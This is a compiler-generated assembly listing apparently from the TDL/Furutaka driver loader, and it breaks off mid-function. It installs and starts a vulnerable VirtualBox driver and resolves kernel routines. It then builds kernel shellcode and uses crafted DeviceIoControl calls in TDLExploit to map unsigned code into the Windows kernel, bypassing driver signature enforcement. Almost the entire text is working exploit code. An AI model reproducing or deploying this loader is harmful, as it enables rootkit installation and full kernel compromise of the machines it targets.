FLAT:??_C@_1BG@NMHFFIMF@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAA?$AAd?$AAp@ mov rcx, rbx call supStopVBoxService test al, al jne SHORT $LN10@TDLStartVu ; Line 542 lea rcx, OFFSET FLAT:??_C@_1GA@LHPDJMJC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; Line 543 jmp $LN3@TDLStartVu $LN10@TDLStartVu: ; Line 546 lea rdx, OFFSET FLAT:??_C@_1BG@LHEADFGC@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAL?$AAw?$AAf@ mov rcx, rbx call supStopVBoxService test al, al jne SHORT $LN11@TDLStartVu ; Line 547 lea rcx, OFFSET FLAT:??_C@_1GA@GBNHFGF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; Line 548 jmp $LN3@TDLStartVu $LN11@TDLStartVu: ; Line 551 mov ecx, 1000 ; 000003e8H call QWORD PTR __imp_Sleep ; Line 553 mov rdx, rdi mov rcx, rbx call supStopVBoxService test al, al jne SHORT $LN12@TDLStartVu ; Line 554 lea rcx, OFFSET FLAT:??_C@_1FK@PPBPJHOO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; Line 555 jmp $LN3@TDLStartVu $LN12@TDLStartVu: ; Line 564 cmp DWORD PTR g_VBoxInstalled, 0 je SHORT $LN15@TDLStartVu ; Line 565 xor ecx, ecx call supBackupVBoxDrv ; Line 566 lea rcx, OFFSET FLAT:??_C@_1GA@MAPIMDHK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ mov edx, r15d test eax, eax je SHORT $LN26@TDLStartVu ; Line 569 lea rcx, OFFSET FLAT:??_C@_1EG@BNHCAMNI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAV?$AAi?$AAr?$AAt?$AAu?$AAa?$AAl?$AAB?$AAo?$AAx@ $LN26@TDLStartVu: ; Line 574 call cuiPrintTextW $LN15@TDLStartVu: lea rdx, OFFSET FLAT:??_C@_1CK@EAKAPGOF@?$AA?2?$AAd?$AAr?$AAi?$AAv?$AAe?$AAr?$AAs?$AA?2?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr@ lea rcx, QWORD PTR szDriverFileName$[rsp] call _strcat_w ; Line 575 mov r8d, DWORD PTR DataSize$[rbp-256] lea rcx, QWORD PTR szDriverFileName$[rsp] and DWORD PTR [rsp+32], 0 xor r9d, r9d mov rdx, rsi call supWriteBufferToFile ; Line 578 cmp eax, DWORD PTR DataSize$[rbp-256] je SHORT $LN16@TDLStartVu ; Line 579 lea rcx, OFFSET FLAT:??_C@_1EM@JFFPOLPF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAr?$AAi?$AAt@ ; Line 580 jmp SHORT $LN3@TDLStartVu $LN16@TDLStartVu: ; Line 584 cmp DWORD PTR g_VBoxInstalled, 0 jne SHORT $LN17@TDLStartVu ; Line 585 lea r8, QWORD PTR szDriverFileName$[rsp] mov rdx, rdi mov rcx, rbx call scmInstallDriver $LN17@TDLStartVu: ; Line 589 mov rdx, rdi mov rcx, rbx call scmStartDriver test eax, eax je SHORT $LN18@TDLStartVu ; Line 591 lea rdx, QWORD PTR hDevice$[rbp-256] mov rcx, rdi call scmOpenDevice test eax, eax lea rcx, OFFSET FLAT:??_C@_1FC@KOAIOCA@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ lea rdx, OFFSET FLAT:??_C@_1EA@LLGDEEI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAd?$AAe?$AAv@ cmove rcx, rdx ; Line 596 jmp SHORT $LN3@TDLStartVu $LN18@TDLStartVu: ; Line 598 lea rcx, OFFSET FLAT:??_C@_1EI@IPNBHDCN@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ $LN3@TDLStartVu: ; Line 606 mov edx, r15d call cuiPrintTextW test rbx, rbx je SHORT $LN22@TDLStartVu ; Line 607 mov rcx, rbx call QWORD PTR __imp_CloseServiceHandle $LN22@TDLStartVu: ; Line 609 mov rax, QWORD PTR hDevice$[rbp-256] $LN1@TDLStartVu: ; Line 610 lea r11, QWORD PTR [rsp+1088] mov rbx, QWORD PTR [r11+48] mov rsi, QWORD PTR [r11+56] mov rsp, r11 pop r15 pop rdi pop rbp ret 0 TDLStartVulnerableDriver ENDP _TEXT ENDS ; Function compile flags: /Ogspy ; COMDAT TDLMapDriver _TEXT SEGMENT Image$ = 48 xExAllocatePoolWithTag$ = 56 xPsCreateSystemThread$ = 64 xZwClose$ = 72 memIO$ = 80 routineName$ = 88 uStr$ = 104 text$ = 128 lpDriverFullName$ = 704 DllCharacteristics$ = 712 Buffer$ = 720 KernelImage$ = 728 TDLMapDriver PROC ; COMDAT ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 323 $LN35: mov QWORD PTR [rsp+8], rbx push rbp push rsi push rdi push r12 push r13 push r14 push r15 lea rbp, QWORD PTR [rsp-384] sub rsp, 640 ; 00000280H ; Line 328 xor r13d, r13d mov esi, 2 mov DWORD PTR DllCharacteristics$[rbp-256], esi mov r14, rcx mov QWORD PTR KernelImage$[rbp-256], r13 or r15d, -1 ; ffffffffH ; Line 329 mov QWORD PTR xExAllocatePoolWithTag$[rsp], r13 mov QWORD PTR xPsCreateSystemThread$[rsp], r13 mov QWORD PTR xZwClose$[rsp], r13 ; Line 330 mov QWORD PTR Image$[rsp], r13 ; Line 332 mov QWORD PTR Buffer$[rbp-256], r13 ; Line 338 call supGetNtOsBase mov rbx, rax ; Line 339 test rax, rax je $LN3@TDLMapDriv ; Line 341 lea rdx, OFFSET FLAT:??_C@_1CM@NLNMPOEI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAK?$AAe?$AAr?$AAn?$AAe?$AAl?$AA?5?$AAb?$AAa?$AAs@ lea rcx, QWORD PTR text$[rbp-256] call _strcpy_w ; Line 342 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rdx, rax mov rcx, rbx call u64tohex_w ; Line 343 lea r12d, QWORD PTR [rsi-1] mov edx, r12d lea rcx, QWORD PTR text$[rbp-256] call cuiPrintTextW ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 xor eax, eax lea ecx, QWORD PTR [rsi+14] lea rdi, QWORD PTR uStr$[rsp] ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 346 mov rdx, r14 ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 rep stosb ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 346 lea rcx, QWORD PTR uStr$[rsp] call QWORD PTR __imp_RtlInitUnicodeString ; Line 347 lea r9, QWORD PTR Image$[rsp] xor ecx, ecx lea r8, QWORD PTR uStr$[rsp] lea rdx, QWORD PTR DllCharacteristics$[rbp-256] call QWORD PTR __imp_LdrLoadDll ; Line 348 test eax, eax js $LN6@TDLMapDriv cmp QWORD PTR Image$[rsp], r13 je $LN6@TDLMapDriv ; Line 353 lea rdx, OFFSET FLAT:??_C@_1EI@DFMENCDB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAd?$AAr?$AAi?$AAv@ lea rcx, QWORD PTR text$[rbp-256] call _strcpy_w ; Line 354 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rcx, QWORD PTR Image$[rsp] mov rdx, rax call u64tohex_w ; Line 355 mov edx, r12d lea rcx, QWORD PTR text$[rbp-256] mov edi, r12d call cuiPrintTextW ; Line 358 mov rcx, QWORD PTR Image$[rsp] call QWORD PTR __imp_RtlImageNtHeader ; Line 359 test rax, rax je $LN3@TDLMapDriv ; Line 362 mov r12d, DWORD PTR [rax+80] ; Line 364 lea rcx, OFFSET FLAT:??_C@_1DE@NBFCBKFB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAL?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5?$AAn?$AAt@ mov edx, edi call cuiPrintTextW ; Line 366 lea rdx, OFFSET FLAT:??_C@_1BK@ELHOPPAM@?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe?$AAx?$AAe@ lea rcx, QWORD PTR uStr$[rsp] call QWORD PTR __imp_RtlInitUnicodeString ; Line 367 lea r9, QWORD PTR KernelImage$[rbp-256] xor edx, edx lea r8, QWORD PTR uStr$[rsp] xor ecx, ecx call QWORD PTR __imp_LdrLoadDll ; Line 368 test eax, eax js $LN10@TDLMapDriv cmp QWORD PTR KernelImage$[rbp-256], r13 je $LN10@TDLMapDriv ; Line 373 lea rdx, OFFSET FLAT:??_C@_1DO@JMKKLPKI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe@ lea rcx, QWORD PTR text$[rbp-256] call _strcpy_w ; Line 374 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rcx, QWORD PTR KernelImage$[rbp-256] mov rdx, rax call u64tohex_w ; Line 375 mov edx, edi lea rcx, QWORD PTR text$[rbp-256] call cuiPrintTextW ; Line 378 lea rdx, OFFSET FLAT:??_C@_0BG@HPOEIOMD@ExAllocatePoolWithTag@ lea rcx, QWORD PTR routineName$[rsp] call QWORD PTR __imp_RtlInitString ; Line 379 mov rcx, QWORD PTR KernelImage$[rbp-256] lea r9, QWORD PTR xExAllocatePoolWithTag$[rsp] xor r8d, r8d lea rdx, QWORD PTR routineName$[rsp] call QWORD PTR __imp_LdrGetProcedureAddress ; Line 380 test eax, eax js $LN13@TDLMapDriv cmp QWORD PTR xExAllocatePoolWithTag$[rsp], r13 je $LN13@TDLMapDriv ; Line 385 lea rdx, OFFSET FLAT:??_C@_1DM@IOMLEMBJ@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAA?$AAl?$AAl?$AAo?$AAc?$AAa?$AAt?$AAe@ lea rcx, QWORD PTR text$[rbp-256] call _strcpy_w ; Line 386 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rcx, rbx mov rdx, rax sub rcx, QWORD PTR KernelImage$[rbp-256] add rcx, QWORD PTR xExAllocatePoolWithTag$[rsp] call u64tohex_w ; Line 387 mov edx, edi lea rcx, QWORD PTR text$[rbp-256] call cuiPrintTextW ; Line 390 mov r14d, 15063 ; 00003ad7H cmp DWORD PTR g_NtBuildNumber, r14d jae $LN19@TDLMapDriv ; Line 391 lea rdx, OFFSET FLAT:??_C@_0BF@OLMDGEDM@PsCreateSystemThread@ lea rcx, QWORD PTR routineName$[rsp] call QWORD PTR __imp_RtlInitString ; Line 392 mov rcx, QWORD PTR KernelImage$[rbp-256] lea r9, QWORD PTR xPsCreateSystemThread$[rsp] xor r8d, r8d lea rdx, QWORD PTR routineName$[rsp] call QWORD PTR __imp_LdrGetProcedureAddress ; Line 393 test eax, eax js $LN17@TDLMapDriv cmp QWORD PTR xPsCreateSystemThread$[rsp], r13 je $LN17@TDLMapDriv ; Line 398 lea rdx, OFFSET FLAT:??_C@_1DK@GFPNMFM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAP?$AAs?$AAC?$AAr?$AAe?$AAa?$AAt?$AAe?$AAS?$AAy@ lea rcx, QWORD PTR text$[rbp-256] call _strcpy_w ; Line 399 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rcx, rbx mov rdx, rax sub rcx, QWORD PTR KernelImage$[rbp-256] add rcx, QWORD PTR xPsCreateSystemThread$[rsp] call u64tohex_w ; Line 400 mov edx, edi lea rcx, QWORD PTR text$[rbp-256] call cuiPrintTextW ; Line 403 lea rdx, OFFSET FLAT:??_C@_07IPICGNAN@ZwClose@ lea rcx, QWORD PTR routineName$[rsp] call QWORD PTR __imp_RtlInitString ; Line 404 mov rcx, QWORD PTR KernelImage$[rbp-256] lea r9, QWORD PTR xZwClose$[rsp] xor r8d, r8d lea rdx, QWORD PTR routineName$[rsp] call QWORD PTR __imp_LdrGetProcedureAddress ; Line 405 test eax, eax js $LN20@TDLMapDriv cmp QWORD PTR xZwClose$[rsp], r13 je $LN20@TDLMapDriv ; Line 410 lea rdx, OFFSET FLAT:??_C@_1CA@CIMCEDAI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAZ?$AAw?$AAC?$AAl?$AAo?$AAs?$AAe?$AA?5?$AA0?$AAx@ lea rcx, QWORD PTR text$[rbp-256] call _strcpy_w ; Line 411 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rcx, rbx mov rdx, rax sub rcx, QWORD PTR KernelImage$[rbp-256] add rcx, QWORD PTR xZwClose$[rsp] call u64tohex_w ; Line 412 mov edx, edi lea rcx, QWORD PTR text$[rbp-256] call cuiPrintTextW $LN19@TDLMapDriv: ; Line 416 lea rax, QWORD PTR [r12+4096] ; Line 417 mov DWORD PTR [rsp+40], 64 ; 00000040H lea r9, QWORD PTR memIO$[rsp] mov QWORD PTR memIO$[rsp], rax xor r8d, r8d mov DWORD PTR [rsp+32], 12288 ; 00003000H lea rdx, QWORD PTR Buffer$[rbp-256] or rcx, -1 call QWORD PTR __imp_NtAllocateVirtualMemory ; Line 419 cmp QWORD PTR Buffer$[rbp-256], r13 jne SHORT $LN21@TDLMapDriv ; Line 420 mov edx, edi lea rcx, OFFSET FLAT:??_C@_1FC@FLNAPHOH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAu?$AAn?$AAa@ ; Line 421 jmp $LN33@TDLMapDriv $LN20@TDLMapDriv: ; Line 406 mov edx, edi lea rcx, OFFSET FLAT:??_C@_1EM@PICGLNPB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAZ?$AAw?$AAC@ ; Line 407 jmp $LN33@TDLMapDriv $LN17@TDLMapDriv: ; Line 394 mov edx, edi lea rcx, OFFSET FLAT:??_C@_1GG@IKDOMIFP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAP?$AAs?$AAC@ ; Line 395 jmp $LN33@TDLMapDriv $LN21@TDLMapDriv: ; Line 424 lea rdx, OFFSET FLAT:??_C@_1DO@CJICDMJP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAh?$AAe?$AAl?$AAl?$AAc?$AAo?$AAd?$AAe?$AA?5@ lea rcx, QWORD PTR text$[rbp-256] call _strcpy_w ; Line 425 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rcx, QWORD PTR Buffer$[rbp-256] mov rdx, rax call u64tohex_w ; Line 426 mov edx, edi lea rcx, QWORD PTR text$[rbp-256] call cuiPrintTextW ; Line 433 mov rax, QWORD PTR Buffer$[rbp-256] ; Line 435 mov rcx, rbx mov BYTE PTR [rax], 72 ; 00000048H mov rax, QWORD PTR Buffer$[rbp-256] mov BYTE PTR [rax+1], 185 ; 000000b9H sub rcx, QWORD PTR KernelImage$[rbp-256] mov rax, QWORD PTR Buffer$[rbp-256] add rcx, QWORD PTR xExAllocatePoolWithTag$[rsp] mov QWORD PTR [rax+2], rcx ; Line 438 mov eax, DWORD PTR g_NtBuildNumber cmp eax, r14d jae SHORT $LN23@TDLMapDriv ; Line 439 mov rax, QWORD PTR Buffer$[rbp-256] ; Line 441 mov rcx, rbx ; Line 448 mov r14d, 798 ; 0000031eH mov BYTE PTR [rax+10], 72 ; 00000048H mov rax, QWORD PTR Buffer$[rbp-256] mov BYTE PTR [rax+11], 186 ; 000000baH sub rcx, QWORD PTR KernelImage$[rbp-256] add rcx, QWORD PTR xPsCreateSystemThread$[rsp] mov rax, QWORD PTR Buffer$[rbp-256] mov QWORD PTR [rax+12], rcx mov rcx, rbx mov rax, QWORD PTR Buffer$[rbp-256] mov BYTE PTR [rax+20], 73 ; 00000049H mov rax, QWORD PTR Buffer$[rbp-256] mov BYTE PTR [rax+21], 184 ; 000000b8H sub rcx, QWORD PTR KernelImage$[rbp-256] mov rax, QWORD PTR Buffer$[rbp-256] add rcx, QWORD PTR xZwClose$[rsp] mov QWORD PTR [rax+22], rcx mov ecx, 30 ; Line 449 mov eax, DWORD PTR g_NtBuildNumber jmp SHORT $LN24@TDLMapDriv $LN23@TDLMapDriv: ; Line 451 mov ecx, 10 mov r14d, 778 ; 0000030aH $LN24@TDLMapDriv: ; Line 456 add rcx, QWORD PTR Buffer$[rbp-256] mov edx, 128 ; 00000080H cmp eax, 15063 ; 00003ad7H jae $LN25@TDLMapDriv ; Line 457 lea rax, OFFSET FLAT:TDLBootstrapLoader_code lea edi, QWORD PTR [rdx-125] $LL32@TDLMapDriv: movups xmm0, XMMWORD PTR [rax] movups XMMWORD PTR [rcx], xmm0 movups xmm1, XMMWORD PTR [rax+16] movups XMMWORD PTR [rcx+16], xmm1 movups xmm0, XMMWORD PTR [rax+32] movups XMMWORD PTR [rcx+32], xmm0 movups xmm1, XMMWORD PTR [rax+48] movups XMMWORD PTR [rcx+48], xmm1 movups xmm0, XMMWORD PTR [rax+64] movups XMMWORD PTR [rcx+64], xmm0 movups xmm1, XMMWORD PTR [rax+80] movups XMMWORD PTR [rcx+80], xmm1 movups xmm0, XMMWORD PTR [rax+96] movups XMMWORD PTR [rcx+96], xmm0 add rcx, rdx movups xmm1, XMMWORD PTR [rax+112] add rax, rdx movups XMMWORD PTR [rcx-16], xmm1 sub rdi, 1 jne SHORT $LL32@TDLMapDriv movups xmm0, XMMWORD PTR [rax] ; Line 460 mov edi, 1 movups XMMWORD PTR [rcx], xmm0 movups xmm1, XMMWORD PTR [rax+16] movups XMMWORD PTR [rcx+16], xmm1 movups xmm0, XMMWORD PTR [rax+32] movups XMMWORD PTR [rcx+32], xmm0 movups xmm1, XMMWORD PTR [rax+48] movups XMMWORD PTR [rcx+48], xmm1 movups xmm0, XMMWORD PTR [rax+64] movups XMMWORD PTR [rcx+64], xmm0 movups xmm1, XMMWORD PTR [rax+80] movups XMMWORD PTR [rcx+80], xmm1 lea rcx, OFFSET FLAT:??_C@_1FE@IBOBMBO@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAf?$AAa?$AAu?$AAl?$AAt?$AA?5?$AAb?$AAo@ jmp SHORT $LN26@TDLMapDriv $LN25@TDLMapDriv: ; Line 462 lea rax, OFFSET FLAT:TDLBootstrapLoader_code_w10rs2 $LL31@TDLMapDriv: movups xmm0, XMMWORD PTR [rax] movups XMMWORD PTR [rcx], xmm0 movups xmm1, XMMWORD PTR [rax+16] movups XMMWORD PTR [rcx+16], xmm1 movups xmm0, XMMWORD PTR [rax+32] movups XMMWORD PTR [rcx+32], xmm0 movups xmm1, XMMWORD PTR [rax+48] movups XMMWORD PTR [rcx+48], xmm1 movups xmm0, XMMWORD PTR [rax+64] movups XMMWORD PTR [rcx+64], xmm0 movups xmm1, XMMWORD PTR [rax+80] movups XMMWORD PTR [rcx+80], xmm1 movups xmm0, XMMWORD PTR [rax+96] movups XMMWORD PTR [rcx+96], xmm0 add rcx, rdx movups xmm1, XMMWORD PTR [rax+112] add rax, rdx movups XMMWORD PTR [rcx-16], xmm1 sub rsi, rdi jne SHORT $LL31@TDLMapDriv movups xmm0, XMMWORD PTR [rax] movups XMMWORD PTR [rcx], xmm0 movups xmm1, XMMWORD PTR [rax+16] movups XMMWORD PTR [rcx+16], xmm1 movups xmm0, XMMWORD PTR [rax+32] movups XMMWORD PTR [rcx+32], xmm0 movups xmm1, XMMWORD PTR [rax+48] movups XMMWORD PTR [rcx+48], xmm1 mov al, BYTE PTR [rax+64] mov BYTE PTR [rcx+64], al ; Line 464 lea rcx, OFFSET FLAT:??_C@_1GE@DNGFNKBK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AA1?$AA0@ $LN26@TDLMapDriv: ; Line 467 mov edx, edi call cuiPrintTextW mov rcx, QWORD PTR Buffer$[rbp-256] mov r8, r12 mov rdx, QWORD PTR Image$[rsp] mov edi, r14d add rcx, rdi call memcpy ; Line 469 mov esi, 1 lea rcx, OFFSET FLAT:??_C@_1DK@DFOOLLG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAR?$AAe?$AAs?$AAo?$AAl?$AAv?$AAi?$AAn?$AAg?$AA?5@ mov edx, esi call cuiPrintTextW ; Line 470 mov rcx, QWORD PTR Buffer$[rbp-256] mov r8, rbx mov rdx, QWORD PTR KernelImage$[rbp-256] add rcx, rdi call TDLResolveKernelImport ; Line 472 mov edx, esi lea rcx, OFFSET FLAT:??_C@_1CO@PHLCFHAC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAe?$AAc?$AAu?$AAt?$AAi?$AAn?$AAg?$AA?5@ call cuiPrintTextW ; Line 473 mov rcx, QWORD PTR Buffer$[rbp-256] lea edx, DWORD PTR [r12+4096] mov r8d, r14d call TDLExploit ; Line 474 mov r15d, r13d ; Line 475 jmp SHORT $LN3@TDLMapDriv $LN13@TDLMapDriv: ; Line 381 mov edx, edi lea rcx, OFFSET FLAT:??_C@_1GI@FJBFMIKD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAE?$AAx?$AAA@ ; Line 382 jmp SHORT $LN33@TDLMapDriv $LN10@TDLMapDriv: ; Line 369 mov edx, edi lea rcx, OFFSET FLAT:??_C@_1EM@IPLJLOBG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ ; Line 370 jmp SHORT $LN33@TDLMapDriv $LN6@TDLMapDriv: ; Line 349 mov edx, r12d lea rcx, OFFSET FLAT:??_C@_1FG@JJGLGCIM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ $LN33@TDLMapDriv: ; Line 478 call cuiPrintTextW $LN3@TDLMapDriv: cmp QWORD PTR Buffer$[rbp-256], r13 je SHORT $LN27@TDLMapDriv ; Line 480 mov r9d, 32768 ; 00008000H mov QWORD PTR memIO$[rsp], r13 lea r8, QWORD PTR memIO$[rsp] or rcx, -1 lea rdx, QWORD PTR Buffer$[rbp-256] call QWORD PTR __imp_NtFreeVirtualMemory $LN27@TDLMapDriv: ; Line 484 mov rbx, QWORD PTR [rsp+704] mov eax, r15d add rsp, 640 ; 00000280H pop r15 pop r14 pop r13 pop r12 pop rdi pop rsi pop rbp ret 0 TDLMapDriver ENDP _TEXT ENDS ; Function compile flags: /Ogspy ; COMDAT TDLExploit _TEXT SEGMENT pLoadTask$ = 64 memIO$ = 72 Cookie$ = 80 vmFast$ = 136 ldrFree$ = 168 paramOut$ = 200 OpenLdr$ = 208 text$ = 272 Shellcode$ = 832 CodeSize$ = 840 DataOffset$ = 848 bytesIO$ = 856 TDLExploit PROC ; COMDAT ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 159 $LN26: mov rax, rsp mov QWORD PTR [rax+8], rbx mov QWORD PTR [rax+16], rsi mov QWORD PTR [rax+24], rdi push rbp push r12 push r13 push r14 push r15 lea rbp, QWORD PTR [rax-568] sub rsp, 784 ; 00000310H ; Line 171 mov r10, QWORD PTR g_hVBox xor r13d, r13d mov r12d, r8d mov r15, rcx mov esi, edx mov DWORD PTR bytesIO$[rbp-256], r13d mov QWORD PTR pLoadTask$[rsp], r13 cmp r10, -1 je $LN13@TDLExploit ; Line 180 movups xmm0, XMMWORD PTR ??_C@_0BA@FMLBJMJD@The?5Magic?5Word?$CB@ ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 xor eax, eax ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 182 mov QWORD PTR [rsp+56], r13 lea r9d, QWORD PTR [r13+48] ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 lea rdi, QWORD PTR Cookie$[rsp] ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 182 lea r8, QWORD PTR Cookie$[rsp] ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 lea edx, QWORD PTR [rax+56] mov ecx, edx rep stosb ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 182 lea rax, QWORD PTR bytesIO$[rbp-256] mov DWORD PTR Cookie$[rsp+12], edx mov QWORD PTR [rsp+48], rax mov rcx, r10 mov DWORD PTR [rsp+40], edx lea rax, QWORD PTR Cookie$[rsp] mov edx, 2261508 ; 00228204H mov QWORD PTR [rsp+32], rax mov DWORD PTR Cookie$[rsp], 1769107316 ; 69726f74H mov DWORD PTR Cookie$[rsp+8], r9d mov QWORD PTR Cookie$[rsp+16], 1107296322 ; 42000042H mov DWORD PTR Cookie$[rsp+40], r13d mov DWORD PTR Cookie$[rsp+44], 458754 ; 00070002H movdqu XMMWORD PTR Cookie$[rsp+24], xmm0 call QWORD PTR __imp_DeviceIoControl test eax, eax jne SHORT $LN4@TDLExploit ; Line 186 lea rcx, OFFSET FLAT:??_C@_1EE@GCOPAAPI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ $LN24@TDLExploit: ; Line 301 mov edx, 1 $LN23@TDLExploit: call cuiPrintTextW jmp $LN3@TDLExploit $LN4@TDLExploit: ; Line 198 movsd xmm0, QWORD PTR ??_C@_08EFILHJLF@furutaka@ ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 lea rdi, QWORD PTR OpenLdr$[rbp-256] xor eax, eax ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 200 mov QWORD PTR [rsp+56], r13 lea r8, QWORD PTR OpenLdr$[rbp-256] ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 lea edx, QWORD PTR [rax+64] mov ecx, edx ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 200 mov r9d, edx ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 rep stosb ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 191 mov eax, DWORD PTR Cookie$[rsp+24] ; Line 194 lea ecx, QWORD PTR [rdx-24] mov DWORD PTR OpenLdr$[rbp-256], eax mov eax, DWORD PTR Cookie$[rsp+28] mov DWORD PTR OpenLdr$[rbp-252], eax ; Line 198 mov al, BYTE PTR ??_C@_08EFILHJLF@furutaka@+8 mov BYTE PTR OpenLdr$[rbp-220], al ; Line 200 lea rax, QWORD PTR bytesIO$[rbp-256] mov QWORD PTR [rsp+48], rax lea rax, QWORD PTR OpenLdr$[rbp-256] mov DWORD PTR [rsp+40], ecx mov DWORD PTR OpenLdr$[rbp-248], edx mov edx, 2261524 ; 00228214H mov DWORD PTR OpenLdr$[rbp-244], ecx mov rcx, QWORD PTR g_hVBox mov QWORD PTR [rsp+32], rax mov QWORD PTR OpenLdr$[rbp-240], 1107296322 ; 42000042H mov DWORD PTR OpenLdr$[rbp-232], esi movsd QWORD PTR OpenLdr$[rbp-228], xmm0 call QWORD PTR __imp_DeviceIoControl test eax, eax jne SHORT $LN5@TDLExploit ; Line 204 lea rcx, OFFSET FLAT:??_C@_1EI@FJDONFON@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; Line 205 jmp $LN24@TDLExploit $LN5@TDLExploit: ; Line 208 lea rdx, OFFSET FLAT:??_C@_1EI@CGOGKFDE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAp?$AAe?$AAn?$AAL?$AAd?$AAr?$AA?4?$AAu?$AA?4@ lea rcx, QWORD PTR text$[rbp-256] call _strcpy_w ; Line 209 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov rcx, QWORD PTR OpenLdr$[rbp-232] mov rdx, rax call u64tohex_w ; Line 210 mov ebx, 1 lea rcx, QWORD PTR text$[rbp-256] mov edx, ebx call cuiPrintTextW ; Line 213 mov r14, QWORD PTR OpenLdr$[rbp-232] ; Line 215 lea rax, QWORD PTR [rsi+4096] ; Line 216 mov DWORD PTR [rsp+40], 4 lea r9, QWORD PTR memIO$[rsp] xor r8d, r8d mov QWORD PTR memIO$[rsp], rax lea rdx, QWORD PTR pLoadTask$[rsp] mov DWORD PTR [rsp+32], 12288 ; 00003000H or rcx, -1 call QWORD PTR __imp_NtAllocateVirtualMemory ; Line 219 mov rcx, QWORD PTR pLoadTask$[rsp] 